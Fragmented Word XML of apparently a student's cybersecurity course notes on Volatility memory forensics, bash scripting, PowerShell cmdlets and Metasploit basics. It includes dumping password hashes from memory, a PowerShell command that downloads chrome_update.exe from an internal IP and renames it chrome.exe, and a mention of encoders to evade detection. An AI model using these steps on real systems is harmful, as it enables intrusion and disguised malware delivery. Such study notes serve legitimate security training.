      </w:r>
      <w:proofErr w:type="spellEnd"/>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SAM\Domains\Account\Users\Names” – output all the users</w:t>
      </w:r>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 -f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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dump.mem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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le=winxpsps2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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scan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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s all the connection that’s has been on the computer</w:t>
      </w:r>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 -f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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dump.mem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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le=winxpsps2 connections – shows all the connections that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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e when the memory has been take</w:t>
      </w:r>
      <w:r w:rsidR="003907B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 -f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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dump.mem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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le=winxpsps2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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line</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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lllist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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788 – shows the path of the process</w:t>
      </w:r>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 -f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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dump.mem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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le=winxpsps2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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velist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005017A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a list of all the registries</w:t>
      </w:r>
      <w:r w:rsidR="008D2D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 -f dump2.mem –profile=vistasp1x86 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008D2D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dump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008D2D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the hashes of the user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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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 a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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l</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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ce syntax</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py -f m4.vmem windows.info – output profile, as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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nfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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vol 2.5</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py -f m4.vmem </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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pslist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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processe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py -f m4.vmem </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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netscan.NetScan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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s connection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py -f m4.vmem </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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envas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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computer name</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py -f m4.vmem </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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filescan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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a lot of paths of files, and its offset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py -f m4.vmem </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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dumpfiles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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x808 – extract a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386D12BE" w14:textId="77777777" w:rsidR="00A80D19" w:rsidRPr="00933DDE" w:rsidRDefault="00A80D19"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CFD8D" w14:textId="77777777" w:rsidR="0094127D" w:rsidRDefault="0094127D"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BA3C" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E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8907D" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E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31F6A" w14:textId="41A9147F" w:rsidR="0094127D" w:rsidRPr="000C387E" w:rsidRDefault="0094127D" w:rsidP="0094127D">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any</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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9709963" w14:textId="588FFB65" w:rsidR="00670C38" w:rsidRPr="00670C38" w:rsidRDefault="00670C38" w:rsidP="00670C3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bash – the first line in bash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p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lled shebang</w:t>
      </w:r>
      <w:r w:rsidR="00586B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mod +x file.sh – for we could run the script</w:t>
      </w:r>
      <w:r w:rsidR="000D3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sh – run the script</w:t>
      </w:r>
      <w:r w:rsidR="000D3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ash file.sh – run the script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1468EBFB" w14:textId="7FD96049" w:rsidR="0052648E" w:rsidRDefault="00670C38"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nter a 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answer</w:t>
      </w:r>
      <w:r w:rsidR="001A6F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input </w:t>
      </w:r>
      <w:r w:rsidR="003C2A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p “enter a name: ” name – shortcut of echo and read in the same line</w:t>
      </w:r>
      <w:r w:rsidR="001A6F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s answer – get input without seeing on the screen</w:t>
      </w:r>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e “1. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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dasd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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2. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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dawd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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for using special characters as \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answer” – using the variable, pay attention, </w:t>
      </w:r>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w:t>
      </w:r>
      <w:r w:rsidR="006208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6208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6208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 erel.txt | awk ‘{print $NF}’) – insert a value to variable</w:t>
      </w:r>
      <w:r w:rsidR="001D0E2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ace is must not</w:t>
      </w:r>
      <w:r w:rsidR="00B953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ocation = $(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B953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d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B953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ccumulate the current path</w:t>
      </w:r>
      <w:r w:rsidR="00F344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umber = $((number + count)) – syntax of sum of 2 numbers </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BA59AB" w14:textId="7EC0E767" w:rsidR="0052648E" w:rsidRDefault="0052648E" w:rsidP="00E3309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WHOIS()</w:t>
      </w:r>
      <w:r w:rsidR="00E330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cho ”hello”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F4B238" w14:textId="43B0D5EF" w:rsidR="0052648E" w:rsidRDefault="0052648E"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OI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syntax for function, you have to remember to call the function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD0EEEE" w14:textId="77777777" w:rsidR="00CF33F1" w:rsidRDefault="0052648E" w:rsidP="00CF33F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answer” == “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cho “ok, by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cho “wrong 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yntax of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have to put fi in the end, you have to write then line after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ou can compare strings in ==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D6A5B3" w14:textId="77777777" w:rsidR="00EE1783" w:rsidRDefault="00CF33F1" w:rsidP="00EE178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name” == “” ] – check if the variable is empty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ED1DEF" w14:textId="052D92E6" w:rsidR="00CC2CFA" w:rsidRDefault="00CC2CFA" w:rsidP="00CC2C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C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grep -q '[^[:space:]]' "$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2C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location</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2C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if the file contains anything then space (to check if the file is empty of content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6C7BA7" w14:textId="4572672E" w:rsidR="00987E1B" w:rsidRDefault="00987E1B" w:rsidP="00CC2C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d “/home/kali/results” ] – check if the directory exist then, else …</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248537FE" w14:textId="32F5853E" w:rsidR="00233685" w:rsidRDefault="00233685"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f “$path” ] – get as input file path and check if exist then, else…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D05EA7" w14:textId="77777777" w:rsidR="00987E1B" w:rsidRDefault="00987E1B"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country" != "IL" ] &amp;&amp; [ "$country" != ""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the country is no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e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se &amp;&amp; for tw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nets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="534DA8BF" w14:textId="51F90EDA" w:rsidR="0052648E" w:rsidRDefault="00987E1B"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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_if_anonymous</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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q 0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ntax to compare to number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303805E4" w14:textId="206C67F2" w:rsidR="0017417B" w:rsidRPr="00987E1B" w:rsidRDefault="0017417B" w:rsidP="0017417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1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var,,}" == "y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var variable converted to low characters before comparison</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A1B387" w14:textId="4219EE05" w:rsidR="00930780" w:rsidRDefault="00930780"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ing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to search about thi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iplooku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ing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iplooku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to search about thi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p>
    <w:p w14:paraId="75D4AB7F" w14:textId="7D9AB174" w:rsidR="00892789" w:rsidRDefault="00892789"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le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project” – basic animation for beauty headline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BE04B2" w14:textId="3CB1646B" w:rsidR="00FD41BF" w:rsidRDefault="00FD41BF"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2 – wait 2 seconds before continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34173CD5" w14:textId="2C0F6ECC" w:rsidR="00EB2E07" w:rsidRDefault="00EB2E07"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number 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2)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cho “wrong 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yntax of case, the $number is a number to insert one of the cases, *) is for every number that not one of the numbers like 1 or 2 in this cas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cti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lose the case.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D5DED2" w14:textId="77777777" w:rsidR="004456B5" w:rsidRDefault="004456B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E4022" w14:textId="77777777" w:rsidR="004456B5" w:rsidRDefault="004456B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797C7" w14:textId="1DB60CB9" w:rsidR="004456B5" w:rsidRDefault="00D15AE0"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E0">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12DCC3" wp14:editId="5DB8EE59">
            <wp:extent cx="5274310" cy="1688465"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="71498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8331" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1688465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="002D35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ntax for using array, and installing packages, -s for check if the package exist,</w:t>
      </w:r>
      <w:r w:rsidR="002D35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f not, it install the package and sign -y automatically for the question if to install.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D578C8" w14:textId="46065015" w:rsidR="00233685" w:rsidRDefault="00233685"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0 – define a numerical variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3806268D" w14:textId="006476DC" w:rsidR="00CC796D" w:rsidRDefault="00CC796D"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D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dev/null 2&gt;&amp;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all the output from the command, pay attention it will work only if you will put it in the right places, in the end of command before grep and more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2&gt;/dev/null – will not print error, could use to hide logo tools (a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E8F7EC" w14:textId="2B0DECA8" w:rsidR="00CF33F1" w:rsidRDefault="00CF33F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name=$(</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nam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h”) – get full path and extract the name of the file inside the variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74ED5B59" w14:textId="638BC069" w:rsidR="00730659" w:rsidRDefault="00D924ED"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06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the name of file and extract the name of the extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED6E857" w14:textId="0A84234C" w:rsidR="00730659" w:rsidRDefault="00730659"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asd.txt – creates an empty file and override if already exist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7B6F58" w14:textId="48F9C586" w:rsidR="00596447" w:rsidRDefault="00596447"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64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_seconds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005964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 "$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005964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_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005964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current time in epoch time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000AED10" w14:textId="77777777" w:rsidR="00CE3331" w:rsidRDefault="00CE333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38434" w14:textId="3C9C22D5" w:rsidR="00D8498F" w:rsidRDefault="00CE3331" w:rsidP="00CE3331">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331">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00D8498F" w:rsidRPr="00D8498F">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1200B" wp14:editId="0F7A2B22">
            <wp:extent cx="6237515" cy="1607066"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="143983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4320" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6268583" cy="1615071"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AABC8FD" w14:textId="7555F486" w:rsidR="00CE3331" w:rsidRDefault="00CE3331" w:rsidP="00CE33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yntax of the for loop is to take info o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sing tools lik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ca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sing &amp; in the end of the loop, it is does the scanning on all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list simultaneously and save time, by wait command, it wait for the process to end before continue to the next command s in the automation, by timeout 30 , it limit the scan for 30 seconds, by using ${ip}_nmap.txt it know to refer to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and not search for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_nm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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4166AC3A" w14:textId="77777777" w:rsidR="00CF33F1" w:rsidRDefault="00CF33F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17206" w14:textId="77777777" w:rsidR="005578F8" w:rsidRDefault="005578F8"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45D5F" w14:textId="77777777" w:rsidR="005578F8" w:rsidRDefault="005578F8"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7EF9C" w14:textId="77777777" w:rsidR="00F36876" w:rsidRDefault="00F36876"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EA233"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EB742"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8E241"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F076E"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84428"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ABA7A"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EB7E9"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57E7B"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5864C"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D28F8"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B0E06"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57C26"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5B233"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A9C7D"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66DCC"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69607"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B8F07" w14:textId="7322EB1A" w:rsidR="00F36876" w:rsidRPr="000C387E" w:rsidRDefault="00F36876" w:rsidP="00F36876">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wershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F66CB5D" w14:textId="6AE5C162" w:rsidR="002F60DB" w:rsidRDefault="00F613E9" w:rsidP="00FF6A8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name - </w:t>
      </w:r>
      <w:r w:rsidRPr="00F61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the network name of the current computer</w:t>
      </w:r>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75987"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proofErr w:type="spellStart"/>
      <w:r w:rsidR="00475987"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View</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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nderrated command for open the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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put</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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omfortable GUI and use text manipulation, recommended when need to deal with the same output for a while</w:t>
      </w:r>
      <w:r w:rsidR="006A79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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A79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Item</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A79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all the items (files and directories) in my current location</w:t>
      </w:r>
      <w:r w:rsidR="00C95C6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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C95C6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Item</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C95C6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asure – counts the items (similar to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C95C6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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C95C6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00FF6A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t-Location – show my current location (similar to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FF6A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d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FF6A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7A37" w:rsidRP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spellStart"/>
      <w:r w:rsidR="00B77A37" w:rsidRP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Hash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B77A37" w:rsidRP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77A37" w:rsidRP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repl_history</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B77A37" w:rsidRP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 md5</w:t>
      </w:r>
      <w:r w:rsid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md5 hash of a file</w:t>
      </w:r>
      <w:r w:rsidR="006979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mmand -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006979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type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006979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dlet – show all the cmdlet commands</w:t>
      </w:r>
      <w:r w:rsidR="005578F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mmand -name “*invoke*” – find all the commands that contains the string “invoke”</w:t>
      </w:r>
      <w:r w:rsidR="004E72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Help Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004E72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request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004E72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s – will show examples of use this command</w:t>
      </w:r>
      <w:r w:rsidR="002F60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t-Alias cd – show the parallel command in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002F60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shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008A0F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ntent auth.log – get the content of the file (similar to cat)</w:t>
      </w:r>
      <w:r w:rsidR="00024C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ntent auth.log | Select-Object -Index 994 – get line 995 from the file (count from 0)</w:t>
      </w:r>
      <w:r w:rsidR="00C874E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Date – get the current date</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C5241" w:rsidRP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spellStart"/>
      <w:r w:rsidR="001C5241" w:rsidRP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TCPConnection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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data on</w:t>
      </w:r>
      <w:r w:rsidR="00EE29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CP</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s </w:t>
      </w:r>
      <w:r w:rsidR="00EE29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chine</w:t>
      </w:r>
      <w:r w:rsid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F3DD2" w:rsidRP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spellStart"/>
      <w:r w:rsidR="00EF3DD2" w:rsidRP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UDPEndpoint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsid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data on UDP ports (it is not called connections cause in UDP there is not 3-way handshake, meaning there is not process of connection)</w:t>
      </w:r>
      <w:r w:rsidR="00220C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20C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97BF5"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spellStart"/>
      <w:r w:rsidR="00B97BF5"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Item</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B97BF5"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urse | Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B97BF5"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Hash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B97BF5"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 MD5 | Out-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B97BF5"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View</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsid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all the files recursively (also those inside the directories) from you location, find their md5 hash and open GUI to see the output, and filter the output in more comfortable way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB3D4EC" w14:textId="0420F86A" w:rsidR="002C5B72" w:rsidRDefault="002C5B72" w:rsidP="00F613E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B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spellStart"/>
      <w:r w:rsidRPr="002C5B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Item</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C5B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 Sort-Object Length -Descending | Select-Object -First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only the file in my current location then sort them by length in descending order, and output the first</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 – show only fil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irectory – show only directori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curse – search recursively (inside directori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ame – search by name</w:t>
      </w:r>
      <w:r w:rsidR="008E75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Object length -Descending – sort all the objects by length in Descending order</w:t>
      </w:r>
      <w:r w:rsidR="008E75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lect-Object -First 1 – output only the first one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F828776" w14:textId="5E9FF2B4" w:rsidR="008E6B86" w:rsidRDefault="007B0372"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3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spellStart"/>
      <w:r w:rsidRPr="007B03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Item</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B03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urse -File -Filter "auth.log" | Select-Object Mode, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B03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WriteTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B03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gth, Name, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B03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Nam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recursively the auth.log file and show only info on it as </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and more</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ter – search for the name of the file</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name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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ll path for the file</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WriteTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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last time the file was changed</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Length – the size of the file </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000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show all the processes and show stats</w:t>
      </w:r>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775E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Process | sort -Property </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009775E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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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rt all the processes by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>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C4B7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Property</w:t>
      </w:r>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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rt by column </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7566321D" w14:textId="77777777" w:rsidR="00CC6C94" w:rsidRDefault="008E6B86"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Where-Object{$_.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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Name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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 "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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ass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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line of the process named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as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colum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Nam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t-Process | Where-Object{$_.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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Name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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 "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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ass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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Object </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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Path</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only the properties name and path of the proces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ass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2F0F7EB9" w14:textId="2DC7C0D2" w:rsidR="00B64404" w:rsidRDefault="00B64404" w:rsidP="00D372E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AD… - </w:t>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have the Active Directory module install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Identifier (RID) is part of the security identifier (S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spellStart"/>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se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RID of the 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Grou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RID of the gro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se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na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RID of the user donna</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72E2" w:rsidRP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spellStart"/>
      <w:r w:rsidR="00D372E2" w:rsidRP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ser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D372E2" w:rsidRP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 * | Where-Object { $_.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D372E2" w:rsidRP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Value</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D372E2" w:rsidRP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 '-501$'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ll the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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sers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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find the one with RID 501</w:t>
      </w:r>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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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ser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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 * -Properties </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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LastSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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s the last time the password</w:t>
      </w:r>
      <w:r w:rsidR="009D4D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w:t>
      </w:r>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r w:rsidR="00B01D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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B01D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Computer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B01D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 * - show all the computers in the domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7969441C" w14:textId="77777777" w:rsidR="00CC6C94" w:rsidRDefault="00CC6C94"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ervice – get all the services and their status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049EAC90" w14:textId="77777777" w:rsidR="00FE275B" w:rsidRDefault="00CC6C94"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olume – get data on hard disks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6580D9" w14:textId="55A819DF" w:rsidR="00D85A07" w:rsidRDefault="00D85A07"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A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ExecutionPolic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my policy</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vels between restricted to </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ass</w:t>
      </w:r>
      <w:r w:rsidR="001E4F2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levels</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a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every script can run</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does not even alert the user</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restricted means every script can run, but it d</w:t>
      </w:r>
      <w:r w:rsidR="003728B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s prompt the user</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stricted means no scripts are allowed to run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DF3F34" w14:textId="5C42A07C" w:rsidR="00495A6E" w:rsidRPr="00BB17D9" w:rsidRDefault="00495A6E" w:rsidP="00BB17D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Even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h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evtx</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ad event file</w:t>
      </w:r>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the name of the event)</w:t>
      </w:r>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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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Event</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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h .\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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evtx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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mat-List – read the event file with the content of every event</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564EB194" w14:textId="77777777" w:rsid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 favorites – go inside favorites directory (similar to cd)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F35FCAC" w14:textId="52F7AB2A" w:rsidR="00045548" w:rsidRPr="00045548" w:rsidRDefault="00045548" w:rsidP="0004554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5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tring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log</w:t>
      </w:r>
      <w:r w:rsidRPr="000455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 140.206.157.242 | Measure-Objec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unts the amount of times th</w:t>
      </w:r>
      <w:r w:rsidR="007B25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proofErr w:type="spellStart"/>
      <w:r w:rsidR="007B25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7B25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in the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1917E50C" w14:textId="77777777" w:rsid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ke-</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reques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i </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="001F3576">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0.10.10.10:1212/chrome_update.exe</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fil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ers\...\chrome.exe – ask from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in port 1212 (the port need to be open already) the file chrome_update.exe and name it as chrome.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D74C44" w14:textId="77777777" w:rsidR="00061C0E" w:rsidRDefault="00A625A1" w:rsidP="00A625A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ng 8.8.8.8 – check the connection with 8.8.8.8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onnection -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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Name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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8.8.8</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the connection, but return more info then p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spellStart"/>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onnection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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Name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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8.8.8</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more info on the connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D235AB" w14:textId="20FDFCFF" w:rsidR="00FE275B" w:rsidRDefault="00061C0E" w:rsidP="000E615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Ho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for displaying information directly to the conso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ve info with that command into a variable or file</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E6152" w:rsidRPr="008F37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Host "Hello"</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hello</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rite-Output – print the data, also enable us to save the info inside a file or variable</w:t>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Out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llo</w:t>
      </w:r>
      <w:r w:rsidR="000E6152" w:rsidRP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ut-File "file.txt" </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play hello, and also save it into a file</w:t>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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lo – find string hello in a file</w:t>
      </w:r>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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ello – ignoring case sensitive find the string hello in the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D00C87" w14:textId="696EB14D" w:rsidR="00065E66" w:rsidRDefault="00065E66" w:rsidP="00065E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E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65E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Action</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00065E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5E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lentlyContinu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ag used in script to continue the script even if there is an error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF06EAA" w14:textId="77777777" w:rsidR="00FE275B" w:rsidRP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20229" w14:textId="1CBC72D2" w:rsidR="0072035A" w:rsidRDefault="00817295" w:rsidP="009C77E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4590F47" w14:textId="18C8794F" w:rsidR="003D0B21" w:rsidRPr="000C387E" w:rsidRDefault="003D0B21" w:rsidP="003D0B2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sfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00614931">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614931">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venom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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0CEDA82A" w14:textId="731A1108" w:rsidR="003D0B21" w:rsidRDefault="003D0B21"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f6 – command line of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consol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uxiliary – a piece of code with specific meaning such as connect in anonymous to ft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ayload – type of communication such a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_tc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ind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coder – help us to hide the payload for we will not be detect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st exploitation – we will use that after we got a session, for get more date or improve the session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7090412D" w14:textId="3C83476C" w:rsidR="006E5D31" w:rsidRDefault="00F06909"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auxiliary</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specific something we want to get and not explo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earch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xploi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scripts for exploits and get a sess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earch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pos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scripts for upgrade sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A62CFF" w14:textId="53A7144F" w:rsidR="00460961" w:rsidRDefault="006E5D31" w:rsidP="0001024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8 – use one of the script in the list</w:t>
      </w:r>
      <w:r w:rsidR="004B74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fo – will give me info on the option we choo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ptions – search which </w:t>
      </w:r>
      <w:r w:rsidR="00D1413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enter</w:t>
      </w:r>
